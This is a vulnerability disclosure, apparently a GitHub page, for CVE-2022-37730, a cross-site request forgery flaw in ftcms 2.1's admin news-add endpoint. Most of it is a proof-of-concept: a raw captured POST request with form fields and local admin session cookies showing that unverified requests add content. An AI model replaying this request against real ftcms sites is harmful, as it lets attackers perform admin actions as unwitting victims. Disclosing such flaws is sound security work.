Headline
CVE-2022-37730: webvue/Ftcms CSRF.md at gh-pages · whiex/webvue
In ftcms 2.1, there is a Cross Site Request Forgery (CSRF) vulnerability in the PHP page, which causes the attacker to forge a link to trick him to click on a malicious link or visit a page containing attack code, and send a request to the server (corresponding to the identity authentication information) as the victim without the victim’s knowledge.
webvue
Ftcms CSRF vulnerability Vulnerability Description:
News.php There is a CSRF vulnerability in the PHP page, which causes the attacker to forge a link to trick him to click on a malicious link or visit a page containing attack code, and send a request to the server (corresponding to the identity authentication information) as the victim without the victim’s knowledge, so as to complete illegal operations (such as transfer, encryption change, etc.).
Vulnerability impact:
Ftcms2.1
Vulnerability code analysis:
Post receives the parameter submitted by the user and inserts it into the database. The key operation is not verified, and the source address is not verified to be normal
Vulnerability recurrence POC:
POST /ftcms_v2.1/admin/index.php/news/add HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------305284134012023868703806459884 Content-Length: 1526 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/ftcms_v2.1/admin/index.php/news/add Cookie: UM_distinctid=17fa054f6b24c4-01fb2c97ea5a758-4c3e2d72-14a61c-17fa054f6b42db; CNZZDATA1277817436=1845628291-1647658540-%7C1647658540; skinColor=%2Ftemplets%2Fyycms%2Fcss%2Fmytheme-color1.css%3Fv%3D2.3; history=%5B%7B%22name%22%3A%22%E6%88%98%E7%8B%BC%E7%89%B9%E6%94%BB%E9%98%9F%22%2C%22pic%22%3A%22%22%2C%22link%22%3A%22%2Fqxplay%2F82.html%22%2C%22part%22%3A%221%22%7D%5D; debug-bar-tab=ci-events; debug-bar-state=minimized; Hm_lvt_ff7ff59731fd28defa244db58332ee7f=1659488611; Hm_lpvt_ff7ff59731fd28defa244db58332ee7f=1659488611; PHPSESSID=4cdcf6d279bf87697a923efd30719924; username=admin; pwd=admin; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a9ea257045ad5d13deed7226ce5549a5%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A80%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A103.0%29+Gecko%2F20100101+Firefox%2F103.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1659507364%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22user%22%3Ba%3A11%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22userpwd%22%3Bs%3A32%3A%2221232f297a57a5a743894a0e4a801fc3%22%3Bs%3A5%3A%22email%22%3Bs%3A15%3A%22admin%40localhost%22%3Bs%3A7%3A%22regtime%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22regip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A9%3A%22logintime%22%3Bs%3A10%3A%221659489291%22%3Bs%3A7%3A%22loginip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22hits%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22listorder%22%3Bs%3A1%3A%220%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%2215%22%3B%7D%7Dbfe0c537b0aa2eb962fc064b6473bfcd43257af7 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 X-Forwarded-For: 127.0.0.1
-----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[catid]"
1 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[title]"
test -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[keyword]"
test -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[des]"
test -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[image]"
-----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[content]"
test
-----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[add_introduce]"
1 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[introcude_length]"
255 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[auto_thumb]"
1 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[status]"
1 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="info[hits]"
0 -----------------------------305284134012023868703806459884 Content-Disposition: form-data; name="dosubmit"
�交 -----------------------------305284134012023868703806459884-- When the victim visits the forged link, the information can be successfully added